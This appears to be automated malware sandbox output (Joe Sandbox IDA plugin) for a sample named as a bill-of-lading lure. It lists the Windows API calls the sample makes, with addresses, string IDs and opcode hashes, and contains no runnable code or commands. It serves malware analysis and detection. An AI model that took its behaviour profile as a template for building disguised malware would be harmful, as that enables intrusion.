                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DestroyWindow
                                                                                                                      • String ID: msctls_updown32
                                                                                                                      • API String ID: 3375834691-2298589950
                                                                                                                      • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                                                      • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                                                                                                                      • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                                                      • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                                                                                      • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                                                                                      • MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                      • String ID: Listbox
                                                                                                                      • API String ID: 3315199576-2633736733
                                                                                                                      • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                      • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                                                                                      • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                      • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                                                                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$InformationVolume
                                                                                                                      • String ID: HH
                                                                                                                      • API String ID: 2507767853-2761332787
                                                                                                                      • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                      • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                                                                                      • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                      • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                                                                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$InformationVolume
                                                                                                                      • String ID: HH
                                                                                                                      • API String ID: 2507767853-2761332787
                                                                                                                      • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                      • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                                                                      • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                      • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                                                                                      • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                      • API String ID: 3850602802-1010561917
                                                                                                                      • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                                      • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                                                                                                      • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                                      • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                                      • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046BD78
                                                                                                                      • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                                                                                                      • inet_ntoa.WSOCK32(00000000,?), ref: 0046BDCD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                                                                                                      • String ID: HH
                                                                                                                      • API String ID: 1515696956-2761332787
                                                                                                                      • Opcode ID: 536d88bcd2219f00ee4950b39be395ae06382d48515621a82e1548501abb3963
                                                                                                                      • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                                                                                                                      • Opcode Fuzzy Hash: 536d88bcd2219f00ee4950b39be395ae06382d48515621a82e1548501abb3963
                                                                                                                      • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                                                                      • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                                                                      • CoUninitialize.OLE32 ref: 0046CE50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                      • String ID: .lnk
                                                                                                                      • API String ID: 886957087-24824748
                                                                                                                      • Opcode ID: 8095c6d59d69238af541582e7c79e2891b33013a97e816c4c493b562f1f8ea66
                                                                                                                      • Instruction ID: 634f95a1702cd93f148e07eb64efb4b351689d97c5b229aafe37579347e0b37e
                                                                                                                      • Opcode Fuzzy Hash: 8095c6d59d69238af541582e7c79e2891b33013a97e816c4c493b562f1f8ea66
                                                                                                                      • Instruction Fuzzy Hash: E821AF312083009FC700EF55C985F5ABBF4EF89724F148A6EF9549B2E2D7B5A805CB56
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                      • GetMenuItemInfoW.USER32 ref: 004497EA
                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
                                                                                                                      • DrawMenuBar.USER32 ref: 00449828
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$InfoItem$Draw_malloc
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 772068139-4108050209
                                                                                                                      • Opcode ID: aba2b2f37e8aede0e07af882035f7c7ba327ed0a8d43e4983355c33413849c0f
                                                                                                                      • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                                                                                                                      • Opcode Fuzzy Hash: aba2b2f37e8aede0e07af882035f7c7ba327ed0a8d43e4983355c33413849c0f
                                                                                                                      • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocTask_wcslen
                                                                                                                      • String ID: hkG
                                                                                                                      • API String ID: 2651040394-3610518997
                                                                                                                      • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                                      • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                                                                                                                      • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                                      • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                      • API String ID: 2574300362-1816364905
                                                                                                                      • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                      • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                                                                                                      • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                      • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,?,?,00000000,?,?,00000101,?), ref: 004343DE
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                      • API String ID: 2574300362-58917771
                                                                                                                      • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                      • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                                                                                                                      • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                      • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                      • API String ID: 2574300362-3530519716
                                                                                                                      • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                                      • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                                                                                                                      • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                                      • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                      • API String ID: 2574300362-275556492
                                                                                                                      • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                                      • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                                                                                                                      • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                                      • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,0040E551,?), ref: 0040EE7B
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: IsWow64Process$kernel32.dll
                                                                                                                      • API String ID: 2574300362-3024904723
                                                                                                                      • Opcode ID: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                                                                      • Instruction ID: 75875fa2f3f8b89ed4c8cde0d061cde3839b728dd3838c322d7dfd2ddbff31fa
                                                                                                                      • Opcode Fuzzy Hash: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                                                                      • Instruction Fuzzy Hash: 51D0C9B0940707DAC7301F72C91871B7AE4AB40342F204C3EB995A1290DBBCC0408B28
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,0040E5BF,?), ref: 0040EEEB
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040EEFD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                      • API String ID: 2574300362-192647395
                                                                                                                      • Opcode ID: 58ac1dddc1eea1967b9e3df612208a50857473a21dbb81c427901d39c1ebcba1
                                                                                                                      • Instruction ID: 788ba9bdae5bc0ddad915f4d08bdcf590d5e3b2ea1e3da194f5c7121584c3133
                                                                                                                      • Opcode Fuzzy Hash: 58ac1dddc1eea1967b9e3df612208a50857473a21dbb81c427901d39c1ebcba1
                                                                                                                      • Instruction Fuzzy Hash: ABD0C9B0944703AAC7311F72C91C70A7AE4AB40341F204C3EB996E1691DBBCC0508B2C
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1473721057-0
                                                                                                                      • Opcode ID: c8a8680659340ce3ae7b61d15611f915275d61821cdaab737acf418eefb31e18
                                                                                                                      • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                                                                                                                      • Opcode Fuzzy Hash: c8a8680659340ce3ae7b61d15611f915275d61821cdaab737acf418eefb31e18
                                                                                                                      • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                                                                                                                      APIs
                                                                                                                      • __flush.LIBCMT ref: 00414630
                                                                                                                      • __fileno.LIBCMT ref: 00414650
                                                                                                                      • __locking.LIBCMT ref: 00414657
                                                                                                                      • __flsbuf.LIBCMT ref: 00414682
                                                                                                                        • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                        • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
